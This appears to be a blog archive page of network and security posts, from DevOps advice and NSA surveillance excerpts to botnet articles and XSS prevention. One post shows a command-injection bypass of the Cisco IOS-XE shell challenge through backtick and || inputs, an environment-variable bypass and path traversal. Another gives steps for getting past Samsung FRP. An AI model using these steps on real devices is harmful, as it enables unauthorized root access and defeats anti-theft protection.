Showing posts with label Security. Show all posts
Showing posts with label Security. Show all posts

Wednesday, July 3, 2019

Mistakes when adopting DevOps for production network automation

If that sounds a lot like “DevOps is coming to a network near you” then you have perfect pitch, because that’s exactly what’s going on inside enterprises around the globe.

We already have plenty of evidence, empirical and anecdotal, to indicate that use of automation and orchestration in production environments is not an anomaly. In fact, it appears to be accelerating as NetOps teams try to catch up to their DevOps counterparts.

The pressure to reach automated parity with app development environments can lead to skipping the strategy and going right for the tactical approach to adopting a more agile, automated means of making changes to the production pipeline.

That’s not a good thing. Production is not development, and the blast radius is significantly larger in production where there are hundreds -- sometimes thousands -- of applications and business processes relying on shared networking services. You can’t fail fast enough to avoid incurring damages when something goes wrong.

So as automation and orchestration become the norm in production environments, NetOps teams should be mindful of which DevOps practices they embrace and which they don’t. Because when bad habits are really hard to break, the best option is simply to avoid forming them in the first place.
To help you out, here are the top three bad habits you should avoid when adopting DevOps for production network automation and orchestration:

 3 Bad Habits NetOps Should Avoid

 1. Skipping the code review
The State of Code Review 2017 from SmartBear, a supplier of software-quality tools for teams, notes that 74% of developers participate in code reviews. That sounds good, until you realize that means the other 26% aren’t. Unsurprisingly, the No. 1 reason cited for not reviewing code at desired levels is workload.
This is how defects and bugs (excuse me, "undocumented features") creep into software. These are logic and security-based mistakes that can lead to crashes, outages, memory leaks, and even breaches. When you’re writing scripts, and integrating multiple services to automate and orchestrate a process, you are writing code. And if you are writing code, it needs to be reviewed by someone other than you.
Remember, this isn’t testing or QA where you can mess up and it doesn’t impact the business’ bottom line. This will be production, and a single mistake can lead to all sorts of problems. Make the time to conduct code reviews. The benefits are well-documented and include:
  • increased quality of code with higher chance of identifying and eliminating security flaws
  • knowledge sharing -- others learn the process along with the code
  • compliance (ISO 9000/9001)
2. Ignoring maintainability
     According to a 2016 survey conducted by Software Improvement Group and O’Reilly, 70% of respondents "believe that maintainability is the most important aspect of code to measure, even as compared to performance or security."
I hate PERL, and I’m not all that fond of Python. So I’m going to use node.js instead. Or maybe I’m just going to craft some incomprehensible command-line magic with sed, awk, and my friend grep to push this change to that router. Problem is, no one else uses node.js and that command line relies on my system-specific configuration.

     That is not maintainable, and using “whatever language/tool/system” you want to build scripts and services to automate networking makes embracing code reviews really, really hard. It won’t go well for you. If no one else can maintain that code, it becomes yours. For life.

     It’s like the goldfish you begged for when you were eight and now you’re stuck with it.
Standardizing on languages, tools, and systems early is important.

3. Ignoring security Rule Zero
     Every AD&D (Dungeons and Dragons) player, at least all the ones I play with, know about Rule Zero: “The Dungeon Master is the final arbiter of all rule decisions.” It supersedes all other rules in the game, hence the reason it is numbered as zero. In security, we also have a rule zero: “Thou shalt never trust user input. Ever.”

     A number of high-profile outages were caused by ignoring this rule because command-line parameters passed to any script are, by default, user input.  Ignoring this rule may trigger one a resume-generating event by accidentally causing an outage of extreme proportions.

Never trust user input explicitly.

     Whether that’s the IP address of a wiring closet switch or a variable passed to inform a firewall script which port to open or close, don’t blindly execute on it. Instead, always validate input and, if necessary, force the human invoker of the script to verify the input. After all, they might not have meant to push that configuration change to every switch.
     As you proceed with efforts to automate IT in 2018, pay close attention to the habits you’re forming. Avoiding these three bad habits will go a long way toward ensuring a successful and productive year.
at No comments:
Štítky: , , , , , , , , , , , , , ,

Sunday, May 19, 2019

Samsung A3 SM-A310F - FRP Cloud Lock

Разблокировка FRP

1. Flash Service Image ( Сервисная прошивка )
- Odin -- Use the AP or PDA in older version
- boot phone into Download Mode ( blue screen - volDown+Home+Pwr ; rel; volUp )


2. Enable USB debugging on Phone0
> Settings > SW info > tap 10x times Build Number >> DevOps mode

3. Power phone off
-- start to Download Mode again

4. Flash Stock ROM
-- Choose correct country + provider
-- https://www.updato.com

5. Enable OEM Unlock
-- Settings > Developer Mode > Enable OEM Unlock (Disable device security)

now you can flash TWRP and root your A3 .. or keep it in Stock and Encrypt it ;)

6. Flash TWRP Recovery image

Android 7.0+ on Samsung with ROOT -- disable encryption

Разблокировка FRP




at No comments:
Štítky: , , , , , , , , ,

Thursday, March 7, 2019

Cisco DevNet Express Security 2019, Prague


** Cisco DevNet Express ** Prague - 5-6.3.2018 

  • We created a simple automated workflow, using a different APIs. 
  • We identified the Rouge endpoints where malware has executed in our network using AMP for endpoints. 
  • We used ISE to quarantine these endpoints to contain the known threats. 
  • We used the AMP data to collect intelligence on the SHAs using Threat Grid
  • We developed the IPs and Domain list associated with these SHAs from Threat Grid. 
  • We used Umbrella Investigate to gather intelligence on the Domains/IPs. 
  • We used Umbrella Enforcement to contain the threat and prevent the malware from executing, as it can't call home.
  • We used FirePower FDM APIs to enforce and contain the threat on the NextGen firewalls
  • We used the Python programming language to call different APIs. 
  • We used Python to pull and push data from different security systems - creating one. 
  • We used the Python to parse the JSON, XML, YAML and REST API. 
  • We learn how to gather the Intelligence and use it to quickly contain the threat to protect the rest of the network. 
  • The future of DevOps is needed in Security Business already and coming fast to the networking as well.
By the end of the second day we had a multiple missions created by Cisco to apply the above gathered knowledge. 


For one of the participants it was also very happy day as he gained not only knowledge but also a fully equipped Raspberry Pi 3B+ ! 

It was my first reward gained from a CyberSecOps business :) And a fourth RPi into the collection :D
at No comments:
Štítky: , , , , , , , , , , , , , , , ,
Místo: Prague, Czechia

Saturday, December 8, 2018

BGP hijack prevention

https://www.manrs.org
---------------------------------
https://www.blackhat.com/presentations/bh-dc-09/Zmijewski/BlackHat-DC-09-Zmijewski-Defend-BGP-MITM.pdf
---------------------------------
all of the team members needed to be able to work creatively, independently and yet still in concert with each other, sometimes under circumstances of limited communications.
---------------------------------

     International detours and routing changes happen automatically, without human intervention. Even so, they offer an opportunity to the NSA. With some exceptions, the surveillance of raw Internet traffic from foreign points of interception can be conducted entirely under the authority of the president.   

     Congressional and judicial limitations come into play only when that raw Internet traffic is used to “intentionally target a U.S. person,” a legal notion that is narrowly interpreted to exclude the bulk collection, storage, and even certain types of computerized data analysis.8
     This is a crucial issue, because American data are routed across foreign communications cables. Several leading thinkers,9 including Jennifer Granick in her recent report for The Century Foundation, have drawn attention to the creeping risk of domestic surveillance that is conducted from afar.
      This report describes a novel and more disturbing set of risks. As a technical matter, the NSA does not have to wait for domestic communications to naturally turn up abroad.
     In fact, the agency has technical methods that can be used to deliberately reroute Internet communications. The NSA uses the term “traffic shaping to describe any technical means the deliberately reroutes Internet traffic to a location that is better suited, operationally, to surveillance.
     Since it is hard to intercept Yemen’s international communications from inside Yemen itself, the agency might try to “shape” the traffic so that it passes through friendly communications cables located on friendlier territory.10

     Think of it as diverting part of a river to a location from which it is easier (or more legal) to catch fish.
     The NSA has clandestine means of diverting portions of the river of Internet traffic that travels on global communications cables.

     If, for example, the Federal Bureau of Investigations (FBI) wants to monitor electronic communications between two Americans as part of a criminal investigation, it is required by law to obtain a warrant.12
     If the intelligence community wants to intercept Americans’ communications inside the United States, for national security reasons, then it must follow rules established by the Foreign Intelligence Surveillance Act (FISA).13
    Meanwhile, when the intelligence community wants to intercept traffic abroad, its surveillance is mostly regulated by Executive Order 12333 (EO 12333),14 issued by Ronald Reagan in 1981.15
     Surveillance programs conducted under FISA are subject to oversight by the FISA Court and regular review by the intelligence committees in Congress.
     Meanwhile, surveillance programs under EO 12333 are largely unchecked by either the legislative16 or judicial branch. EO 12333 programs are conducted entirely under the authority of the president.

     The narrow interpretation of “targeting” has significant implications on privacy for U.S. persons. For instance, the NSA has built a “search engine44 that allows analysts to hunt through raw data collected in bulk through various means. If a human analyst uses that search engine to search for communications linked to a specific email address, Facebook username, or other personal identifier—a “selector45—then that counts as “intentional targeting.”
     However, if an analyst obtains information using search terms that do not implicate a single individual—for example, words or phrases such as “Yemen” or “nuclear proliferation”—the communications swept up as part of this search, such as an email between two Americans discussing current events in Yemen, are not considered to be “intentionally targeted.”46 Instead, these communications are merely “incidentally collected.”47
      U.S. surveillance techniques are classified, which prevents outside observers from making categorical statements about how far the intelligence community stretches this notion of “incidental collection.”

     But how do communications between two Americans typically travel abroad?
    It can sometimes be faster or cheaper for Internet service providers (ISP) to send traffic through a foreign country. The United States has a well-connected communications infrastructure, so it is rare to find a case where traffic sent between two domestic computers naturally travels through a foreign country. 
     Nevertheless, these cases do occur. One such case (identified by Dyn Research’s Internet measurement infrastructure) is presented below
(Figure 1)
     The “traceroute” presented below shows how Internet traffic sent between two domestic computers travels through foreign territory. The traffic originates at a computer in San Jose and is routed through Frankfurt before arriving at its final destination in New York. The left column shows the Internet Protocol (IP) address of each Internet device on the route, the middle column names the Internet Service Provider (ISP) that owns this device, and the right column shows the location of the device.




Replicating U.S.-based data in foreign data centers is a common industry practice, in order to ensure that data can be recovered even in the face of local disasters (power outages, earthquakes, and so on).53 Google, for instance, maintains data centers in the United States, Taiwan, Singapore, Chile, Ireland, the Netherlands, Finland, and Belgium, and its privacy policy states: “Google processes personal information on our servers in many countries around the world. We may process your personal information on a server located outside the country where you live.”54 If two Americans use their Google accounts to communicate, their emails and chat logs may be backed up on Google’s data centers abroad, and thus can be “incidentally collected” as part of EO 12333 surveillance.

Traffic Shaping by “Port Mirroring” at Hacked Routers

It has been reported that the NSA already employs a technique to “shape” traffic so that it travels through a tapped communication cable. The traffic-shaping technique involves hacking into an Internet infrastructure device, for example, a router. A router is a device that forwards Internet traffic to its destination.73 In Figure 3, which was hand-drawn by a hacker employed by the NSA and later leaked, the hacked device74 is called a “CNE midpoint.”75

“Electronic surveillance”
is a legal term that is defined the FISA statute; in fact, despite several amendments, FISA’s definition of “electronic surveillance” remains largely unchanged from its original 1978 version. The FISA definition of “electronic surveillance” has two clauses that could be potentially cover hacking into a U.S. router and instructing it to perform traffic shaping via port-mirroring.
One clause in the FISA statute defines “electronic surveillance” to be
the installation or use of an electronic, mechanical, or other surveillance device in the United States for monitoring to acquire information, other than from a wire or radio communication, under circumstances in which a person has a reasonable expectation of privacy and a warrant would be required for law enforcement purposes.81
In other words, this clause covers the installation of a device in the United States for surveillance. Hacking a U.S. router could certainly be considered the installation of a device. However, a router is a “wireline” device, and this clause does not cover devices that acquire information from a “wire.”82 As such, this clause is not relevant to the discussion.

Another clause in the FISA statute defines “electronic surveillance” as
the acquisition by an electronic, mechanical, or other surveillance device of the contents of any wire communication to or from a person in the United States, without the consent of any party thereto, if such acquisition occurs in the United States, but does not include the acquisition of those communications of computer trespassers that would be permissible under section 2511(2)(i) of title 18, United States Code.83

     This clause covers the “acquisition” of communications inside the United States. However, one could argue that communications are not “acquired” when a U.S. router is hacked and instructed to perform port mirroring. The hacked router is merely instructed to copy traffic and pass it along, but not to read, store, or analyze it. Therefore, “acquisition” occurs at the tapped communication cable (abroad) rather than at the hacked router (inside the United States). As such, this clause is also not relevant.84


     The intelligence community does not have to hack into routers or use other clandestine techniques to shape traffic—it could simply ask the corporations that own those routers to provide access, or shape the traffic themselves. A document leaked by Edward Snowden suggests that the NSA has done this through its FAIRVIEW program.
(FAIRVIEW was revealed to be a code name for AT&T100). The document states:
FAIRVIEW—Corp partner since 1985 with access to int[ernational] cables, routers, and switches. The partner operates in the U.S., but has access to information that transits the nation and through its corporate relationships provide unique access to other telecoms and ISPs. Aggressively involved in shaping traffic to run signals of interest past our monitors.101

     There is no evidence that the FAIRVIEW program is being used to shape traffic from inside the United States to foreign communications cables. But it is worth noting that, with the cooperation of corporations such as AT&T, traffic could easily be shaped to a collection point abroad without the need to hack into any routers, thus obviating many of the legal questions previously discussed.

      Modern networking protocols and technologies can be manipulated in order to shape Internet traffic from inside the United States toward tapped communications cables located abroad. It is possible that traffic shaping is regulated by EO 12333, and not by FISA,102 since the techniques shape traffic in bulk, in a way that does not “intentionally target” any specific individual or organization.
    Moreover, while FISA covers the “acquisition” of Internet traffic on U.S. territory, but the traffic shaping methods discussed merely move traffic around, but do not read, store, analyze, or otherwise “acquire” it. Instead, acquisition is performed on foreign soil, at the tapped communication cable. Finally, while the Fourth Amendment may require a warrant for hacking U.S. routers, the warrant requirement could be avoided by performing traffic shaping with the consent of corporations that own the routers (e.g. via the FAIRVIEW program), or by hacking foreign routers (and then using BGP manipulations).

Technical Solutions Will Not Work

     One might be tempted to eliminate these loopholes via technical solutions. For instance, traffic shaping could be made more difficult by designing routers that are “unhackable,” and Internet protocols could be made secure against traffic-shaping manipulations. Or the confidentiality of traffic could be protected just by encrypting everything.
     While this approach sounds good in theory, in practice it is unlikely to work.
First, it is highly unlikely that we will ever have Internet infrastructure devices (e.g. routers) that cannot be hacked. Router software is complicated, and even the best attempt at an “unhackable” router is likely to contain bugs.104 Intelligence agencies have dedicated resources to finding and using these bugs to hack into routers.105 And even if we somehow manage to create bug-free router software, the intelligence community has been known to physically intercept routers as they ship in the mail, and tamper with their hardware.106

     Second, it will take many years to develop and implement secure Internet protocols that prevent traffic shaping. A key challenge is that the Internet is a global system, one that transcends organizational and national boundaries. Deploying a secure Internet protocol requires cooperation from thousands of independent organizations in different nations. This is further complicated by the fact that many secure Internet protocols do not work well when they are used only by a small number of networks.107

     Finally, while encryption can be used to hide the contents of Internet traffic, it does not hide metadata (that is, who is talking to whom, when they are talking, and for how long). Metadata is both incredibly revealing, and less protected by the law.108 Intelligence agencies have also dedicated resources toward compromising encryption.109 Moreover, EO 12333 allows the NSA to retain encrypted communications indefinitely.110 This is significant because the technology used to break encryption tends to improve over time—a message that was encrypted in the past could be decryptable in the future, as technology improves.111
     This is not to say that technical solutions are unimportant. On the contrary, they are crucial, especially because they protect American’s traffic from snoopers, criminals, foreign intelligence services, and other entities that do not obey American laws. Nevertheless, technologies evolve at a rapid pace, so solving the problem using technology would be a continuous struggle.

     It is much more sensible to realign the legal framework governing surveillance to encompass the technologies, capabilities, and practices of today and of the future.

at 1 comment:
Štítky: , , , , , , , ,

Friday, November 30, 2018

AI and CDN used in Network Exploitation & Attacks (Pt.3)

Working together toward a common goal – attacking networks - that's the task of Intelligent Botnet. Able to share the information on vulnerabilities & hosts, quickly change used strategy without a Botnet horder.

[https://threatpost.com/newsmaker-interview-derek-manky-on-self-organizing-botnet-swarms/136936/]

For over five years Derek Manky, global security strategist at Fortinet and FortiGuard Labs, has been helping the private and public sector identify and fight cybercrime. His job also includes working with noted groups: Computer Emergency Response, NATO NICP, INTERPOL Expert Working Group and the Cyber Threat Alliance.
Recently Threatpost caught up with Manky to discuss the latest developments around his research on botnet “swarm intelligence.” That’s a technique where criminals enlist artificial intelligence (AI) inside botnet nodes. Those nodes are then programmed to work toward a common goal of bolstering an attack chain and accelerating the time it takes to breach an organization.


Threatpost: What are “self-organized botnet swarms?”
Manky: What we are starting to see [are] humans, such as the black-hat hackers, being taken out of the attack cycle more and more. Why? Because humans are slow by nature compared to machines.
Swarms accelerate the attack chain – or attack cycle. They help attackers move fast. Over time, as defenses improve, the window of time for an attack is shrinking. This is a way for attackers to make up for that lost time.
A self-learning swarm is a cluster of compromised devices that leverage peer-based AI to target vulnerable systems. Traditional botnets wait for commands from a bot herder. Swarms are able to make decisions independently. They can identify and assault – or swarm – different attack vectors all at once.

 TP: What type of botnets are we talking about here? Botnets used for crippling a network? Where is this technology seen today?
Manky: Hide and Seek is a recent botnet that we have seen with the swarm technology in it.

 TP: So, what makes Hide and Seek unique?
Manky: Typically a botnet will receive a command from the attacker, right? They go DDoS the target or try to exfiltrate information. But what we are starting to see with these new peer-to-peer botnets is they are able to share those commands – between botnet nodes – and act on their own without an attacker issuing any commands.

 TP:  Is this machine intelligence? And, what is it that these botnets are trying to learn from and execute?
Manky: They are collecting data. They are trying to learn information about potential attack targets – that is, exploits and weaknesses that they can launch a successful attack against. They are trying to pinpoint vulnerabilities or holes that they can actually go and launch a successful exploit against. They are looking for a penetration weakness – something they can send payload to. Once they find it, the node can let the rest of the botnet nodes know.

 TP: Can you break this down into a likely scenario?
Manky: We’re starting to see this in the world of IoT. A hypothetical situation includes a network where there is a barrier – a network firewall, or policies. On the network is a printer, network attached storage, an IP security camera and a database. Then, for whatever reason, the IP security camera is on the same network segment as database. Now [the attack] can target the printer and infect the network attached storage, which infects the camera. Now the camera can be used as a proxy to gather intelligence.
That intelligence is shared between the nodes. It’s a structured command list where it can say “send me a list of targets that you know, have this within the network segment – along with intelligence on that segment.” And then – when the network configurations match – the nodes can swarm and request the exfiltration of data and launch more attacks.

 TP: Is there anything that is unique about the size or agility of these botnets? Does this “intelligence” allow it to be more efficient and smaller?
Manky: Swarms are large by nature. But I would call them first, efficient. Traditional botnets are monolithic. Bot-herders typically rent a botnet out just to [launch] a DDoS attack or just to launch a phishing attack. But with swarms, they have the capability to spin up resources – similar to virtual machines.
Bot-herders can say, “I want 20 percent of this botnet doing DDoS. I want 30 percent doing phishing campaigns.” It’s more about monetization, efficiency and being fast.

 TP: When you say “swarms,” can you give me a sense of what you exactly mean by that?
Manky: The best example is what we see in nature – such as birds, bees and ants. When ants communicate they use pheromones between each other. The pheromones mark the shortest path to bring back food to the nest. Ants, in this scenario, aren’t taking orders from the queen ant. They are acting on their own.
Now the same concept is being applied to botnet code. What we are seeing are precursors of this right now. Hide and Seek has the code, but isn’t using it yet.
Hide and Seek is a decentralized IoT botnet. The capabilities are in the code, but we are still waiting for the first full-blown attack using this technique.
I expect to see a lot more of this technology in 2019.

 TP:  Where does that leave us on the defense side of the equation?
Manky: It really needs to redefine the network security center. We are going to need more automated tools. It’s going to come down to AI versus AI. We need better security postures that are capable of actually detecting and acting on their own as well.
If you are up against a swarm, it’s very fast by nature. It can already breach a target, by the time a human administrator can detect it. For that reason, the network intelligence needs to be able to understand what it is seeing and be able to act on it.
At a higher level, it comes down to quality of intelligence and how much you trust your
at No comments:
Štítky: , , , , , , , , ,

CDN and AI in Network Exploitation (Pt.2)

[https://threatpost.com/how-shared-pools-of-cloud-computing-power-are-changing-the-way-attackers-operate/138108/]

In many ways this migration to the cloud mirrors that of legitimate businesses.

It is much less financially advantageous for attackers to maintain large botnets and maintain the knowledge and expertise needed to avoid detection and grow the bot. The fact that it is much easier to pay somebody else to maintain these things and simply rent time should sound very familiar to anybody that uses a cloud service application like Salesforce or Oracle. The advantages for the attackers are very similar to the advantages gained by a legitimate business. Attackers can offer chunks of their botnet or attack infrastructure for sale. They can gain more money, usually bitcoins, by segmenting their entire bot and selling time on it individually.

DDoS-as-a-service has been around for quite some time and was probably the first foray into the attack-as-a-service model. DDoS-as-a-service was very successful because it removes the necessity for maintaining a large botnet from the attackers themselves. Bot herders could focus instead on growing their botnet and modifying the malware that they used in order to exploit new systems rather than worrying about how much an individual attack was going to impact the botnet as a whole.
From there it was a very short jump to segmenting the bot and allowing for multiple customers to use chunks of it as they needed, rather than throwing the full weight of the bot at a given target. Many of these services operate under the aegis of a “stressor service” for websites to make sure their sites work under load. However, this was merely a fig leaf for the real purpose which was allowing anybody with bitcoin or a credit card to purchase time on a bot and direct attack traffic to a website of their choosing.

The success of this model drove other types of attacks to migrate to the service mode. Ransomware-as-a-service became a very profitable endeavor. Ransomware authors sell turnkey solutions to anybody that has money and provides secure communications, and in some cases even technical support for the victims.

Today, we see a large number of different types of attacks-as-a-service and this makes it very easy for low sophistication attackers to use very high sophistication tools and techniques. Skilled malware authors can use very advanced techniques that would normally be out of the reach of low sophistication attackers, and rather than worrying about being targeted by law enforcement, can simply sell a subscription or a turnkey solution.
This evolution creates new challenges for defenders.

In the past, it would be easy for researchers and security teams with some experience to identify hosting solutions that were known to originate attacks and put them into a network blacklist. This was an easy way to blunt a large number attacks, however as attackers move to cloud services, the fact that there are so many different tenets on these cloud services makes it difficult or impossible to block these IP ranges, and so the first chance of an attack getting past network list is increased dramatically.

Additionally, this type of business makes it possible for low sophistication attackers, or attackers without any knowledge at all, to be able to wield very complicated attack tools against targets simply by paying for a license key.

New technologies are constantly reshaping the business landscape, but business leaders also must consider how these can enable new attacks – or make old mitigations obsolete.
at No comments:
Štítky: , , ,

CDN and AI use in Network Exploitation (Pt.1)

[https://threatpost.com/the-nature-of-mass-exploitation-campaigns/139428/]

In this article we’ll talk about the tactics and procedures observed by Akamai researchers and security teams, as they work through the operational response process of a mass exploitation campaign. Mass Exploitation is a term used to convey the process in which attackers launch an attack campaign in large scale using CDN services, or mass mailing services to reach more victims in less time.
The idea starts with an attacker who has a well-formed payload or exploit, which they need to use at scale in a relatively short period of time.
A common example is a zero-day vulnerability that is posted to an underground forum and purchased by an attacker. As that code starts to get used in the wild, there is a finite amount of time before research teams and incident response teams notice the attack and try to mitigate it. Also, vendor timelines for issuing a patch can vary. This varied timeline of the exploit being “exploitable” is what drives mass exploitation.
There are three main categories for problems as they relate to identification of mass exploitation attempts:
Category One (False Positives): Identifying mass exploitation among the noise in your environment can be daunting. For instance, if you are trying to filter on Remote File Inclusion (RFI) attempts and executed payloads, there is a tremendous amount of noise from security vendors running application scans against your environment looking for risks.This is a RFI test from WhiteHat Security and is very common. If the system being scanned is vulnerable it will download the script and execute it. A process which will be monitored and added to the list of things you need to fix for that system.
Example RFI Exploit Code from WhiteHat Security

Category Two: Further complicating the identification of attack campaigns is purposeful obfuscation by attackers who use techniques such as FastFlux domains and sites like Google or Github to reference content which usually doesn’t raise a lot of attention unless you know what you’re looking for.   

Example 1: raw.githubusercontent.com
By utilizing web shells that are located on Github, the attacker doesn’t need to manage multiple copies of the files as there is little chance that site/URL reputation services will blacklist the Github domain. Here the attacker is calling a PHP shell and using Github’s CDN to utilize caching and acceleration of said shell to the target system.
  

Example 2: googleusercontent.com
Attackers have taken advantage of other types of cloud services to distribute their attack traffic as well – one of which is using Google App Scripts. By creating scripts in Google Sheets that contain scripted commands, an attacker can make requests look like they’re coming from a “trusted” location such as Google. Without context, this may go unnoticed or at least harder to identify good versus bad requests due to the nature of where the requests are originating.

An example of a small website hit with a scripted, but distributed GitFlood driving usage costs up over 
1,000%

Unnoticed, until you start to see the volumes of traffic that can be generated from this infrastructure, or if the requests are taking advantage of an application vulnerability to perform mass exploitation.   

Category Three: The third category is “timely” threat intelligence challenges, and large scale visibility challenges. If Blue Teams can only see threat info on traffic that comes to their own environment, then it’s challenging to see larger scale trends or patterns as efficiently.
We frequently see malicious actors upload their malware/exploit code to more than one third-party website or CDN in an attempt to re-use it, usually for redundancy purposes or if security devices add the URL to a blacklist.
When tracking samples, we identified that they were being accessed by more than one originating IP/ASN which tells us that attackers are proxying through IPs/ASNs when attempting large scale RFI attacks. This technique usually indicates the use of Fast Flux domains.
Fast flux is a DNS technique used by botnets to hide phishing and malware delivery sites behind an ever-changing network of compromised hosts acting as proxies. Fast Flux usage is becoming common for two reasons.

  1. Compromised hosts storing exploit code are being discovered quickly and taken offline before the attackers can make use of them.
  2. Because attackers are launching exploits at many systems as part of large scale exploitation attempts, they require payloads to be highly available.  For this reason, we are seeing an increase in the use of low cost CDN’s to deploy/host attack exploit data.
There are other examples of how attackers win by using mass exploitation campaigns, but to increase the success rate for defending against the above techniques Blue Teams must focus on three distinct areas:
Interstitial inspection: Using reverse proxies or some form of interstitial device/process to perform inspection and validation of requests prior to sending traffic to back end application servers.
Large scale data / threat correlation: The more data you have about an inbound request (application workflow wise) or IP address via threat intelligence sources, the better. The main thing to focus on here is that you have as much info as possible which usually involves a threat feed and data sharing relationships with partners.
Layered defenses: It’s highly valuable to have both perimeter and forward-facing defenses as well as defenses inside or behind the firewall to watch for malicious activity inside the corporate network as well as requests going out to the internet.






at No comments:
Štítky: , , ,

IOS image verfication - running+saved

Verify the authenticity and integrity of the binary file by using the show software authenticity file command. In the following example, taken from a Cisco 1900 Series Router, the command is used to verify the authenticity of c1900-universalk9-mz.SPA.152-4.M2.bin on the system: 
Router# show software authenticity file c1900-universalk9-mz.SPA.152-4.M2

File Name                     : c1900-universalk9-mz.SPA.152-4.M2
Image type                    : Production
    Signer Information
        Common Name           : CiscoSystems
        Organization Unit     : C1900
        Organization Name     : CiscoSystems
    Certificate Serial Number : 509AC949
    Hash Algorithm            : SHA512
    Signature Algorithm       : 2048-bit RSA
    Key Version               : A
In addition, administrators can use the show software authenticity running command to verify the authenticity of the image that is currently booted and in use on the device. Administrators should verify that the Certificate Serial Number value matches the value obtained by using the show software authenticity file on the binary file. The following example shows the output of show software authenticity running on a Cisco 1900 Series Router running the c1900-universalk9-mz.SPA.152-4.M2 image.
Router# show software authenticity running
 
SYSTEM IMAGE
------------
Image type                    : Production
    Signer Information
        Common Name           : CiscoSystems
        Organization Unit     : C1900
        Organization Name     : CiscoSystems
    Certificate Serial Number : 509AC949
    Hash Algorithm            : SHA512
    Signature Algorithm       : 2048-bit RSA
    Key Version               : A
    Verifier Information
        Verifier Name         : ROMMON 1
        Verifier Version      : System Bootstrap, Version 15.0(1r)M9, RELEASE SOFTWARE (fc1)
Technical Support: http://www.cisco.com/techsupport
This example also shows that the Certificate Serial Number value, 509AC949, matches the one obtained with the previous example.
at No comments:
Štítky: , , , , ,

Cisco IOS-XE - Request Platform System Shell

Verifying Authenticity for Digitally Signed Images


Older 3560 & 3580 switches vulnerability:
[code]
Catalyst-3650#request system shell
Activity within this shell can jeopardize the functioning of the system.
Are you sure you want to continue? [y/n] y
Challenge: 94d5c01766c7a0a29c8c59fec3ab992[..]
Please enter the shell access response based on the
above challenge (Press "Enter" when done or to quit.):
/bin/sh
Key verification failed
[/code]

Workaround:
[code]
Please enter the shell access response based on the above challenge
(Press "Enter" when done or to quit.):
`bash 1>&2`
[/code]

No input validation ==>  just use the ' '
[code]
Please enter the shell access response based on the above challenge
(Press "Enter" when done or to quit.):
`reboot`
SecureShell: SecureShell [debug]Key verification failed
Switch#
  
Unmounting ng3k filesystems...
Unmounted /dev/sda3...
Warning! - some ng3k filesystems may not have unmounted cleanly...
Please stand by while rebooting the system...
Restarting system.
  
Booting...Initializing RAM +++++++@@@@@@@@...++++++++
[/code]

Netcat found ...
[code]
bash-3.2# find / -name nc
/tmp/sw/mount/cat3k_caa-infra.SPA.03.03.03SE.pkg/usr/binos/bin/nc
/usr/binos/bin/nc
[/code]

What can be done with it? Whatever reality you want, you might create...
[code]

[EXTRA]    Building a toolchain for:                 
[EXTRA]      build  = x86_64-unknown-linux-gnu
[EXTRA]      host   = x86_64-unknown-linux-gnu
[EXTRA]      target = mips-unknown-elf           

bash-3.2# file /mnt/usb0/ninvaders
/mnt/usb0/ninvaders: ELF 32-bit MSB executable, MIPS, MIPS-I version 1 (SYSV),
dynamically linked (uses shared libs), for GNU/Linux 2.6.18, with unknown capability
0x41000000 = 0xf676e75, stripped

[/code]

When you request shell following thing happens:

a) shell_wrapper calls system('code_sign_verify_nova_pkg SecureShell challenge response') (same binary is used to verify the images)
b) code_sign_verify_nova_pkg reads via libcodesign_pd.so+libflash.so 2k from /dev/mtdblock6, signs challenge, compares to response and return 0 if it is valid, other wise
c) so anything like ||/bin/true will work just fine

shell_wrapper ignores verification if DISABLE_SHELL_AUTHENTICATION=1 in environment

mtdblock6 RSA public key can be changed, so you can generate valid response by having its secret companion
[code]
you can escape IOS filesystem jail (/mnt/sd3/user) with ../../ sop copy foo ../../etc would copy foo to /etc
[/code]

at No comments:
Štítky: , , , , , , , ,

Wednesday, October 17, 2018

Cisco MACs (OUI) addresses - all of them

00:00:0C        Cisco                  # CISCO SYSTEMS, INC.
00:01:42        Cisco                  # CISCO SYSTEMS, INC.
00:01:43        Cisco                  # CISCO SYSTEMS, INC.
00:01:63        Cisco                  # CISCO SYSTEMS, INC.
00:01:64        Cisco                  # CISCO SYSTEMS, INC.
00:01:96        Cisco                  # CISCO SYSTEMS, INC.
00:01:97        Cisco                  # CISCO SYSTEMS, INC.
00:01:C7        Cisco                  # CISCO SYSTEMS, INC.
00:01:C9        Cisco                  # CISCO SYSTEMS, INC.
00:02:16        Cisco                  # CISCO SYSTEMS, INC.
00:02:17        Cisco                  # CISCO SYSTEMS, INC.
00:02:3D        Cisco                  # Cisco Systems, Inc.
00:02:4A        Cisco                  # CISCO SYSTEMS, INC.

Read more »
at No comments:
Štítky: , , , , , , , , , , , , , ,

Sunday, September 30, 2018

Steps to prevent leverage of cross-site scripting attacks

Cross-site scripting attacks

How-To: Prevent the XSS attack-vector leverage

 Additional steps from Development to Deployment

 **Developers** 

     - Should determine what is a safe user input and reject all others - be it a text, javascript or any unauthorized piece of code
    - Depending on the Input text box, developers can restrict text to certain characters (avoid ones causing troubles) and also limit the maximum number of characters
    - should write a code which checks that improperly formatted data are never inserted directly into the HTML content, that might compromise the whole web application
    - should implement prepared statements (known to be reliable) for any database queries as well as the input validation described above

**Website operators **

    - should carefully choose third-party web app providers to ensure their products have the right security measures in place
    - should test the web apps to ensure that they are not vulnerable to attacks involving cross-site scripting or SQL injections
    - should continuously scan their sites in real-time to detect any unauthorized code. This should involve not only automated website vulnerability scanners (i.e.: Nikto, OVASP)
    - you have to be proactive == > hire an experienced professionals ( White or Grey ) who can assess web app security against attacks like these with a custom approach
 ========================================================================
     The last step is important !
Anything less than a pro-active, comprehensive approach to securing the sites will grow to infringement of a great number of consumer's data privacy due to regulations like GDPR.
     As a good example of a DO's & DON'Ts we might mention the recent attack on "The British Airways". But you can practically choose any of the large attacks during the past 5 years.
 ========================================================================
         
                   ::Remember::

 Just because a website is secure that necessarily doesn't mean that a web application is secure as well
     
 source: TechRepublic 
( https://www.techrepublic.com/article/british-airways-data-theft-demonstrates-need-for-cross-site-scripting-restrictions )
at No comments:
Štítky: , , , , , , ,

Saturday, July 21, 2018

HowTo - Intel HD 3000 driver issues in Windows 10 (1803)

If you've updated to latest version of Windows 10 (1803) and now you see an error that looks like the following:

Windows cannot load the device driver for this hardware.
The driver may be corrupted or missing. (Code 39)

{Bad Image}
%hs is either not designed to run on Windows or it contains an error.
Try installing the program again using the original installation media
or contact your system administrator or the software vendor for support.
Error status 0x

To quickly resolve this issue

1. Open RegEdit
(Win+R to open Run and type regedit ; enter)

2. Then go to
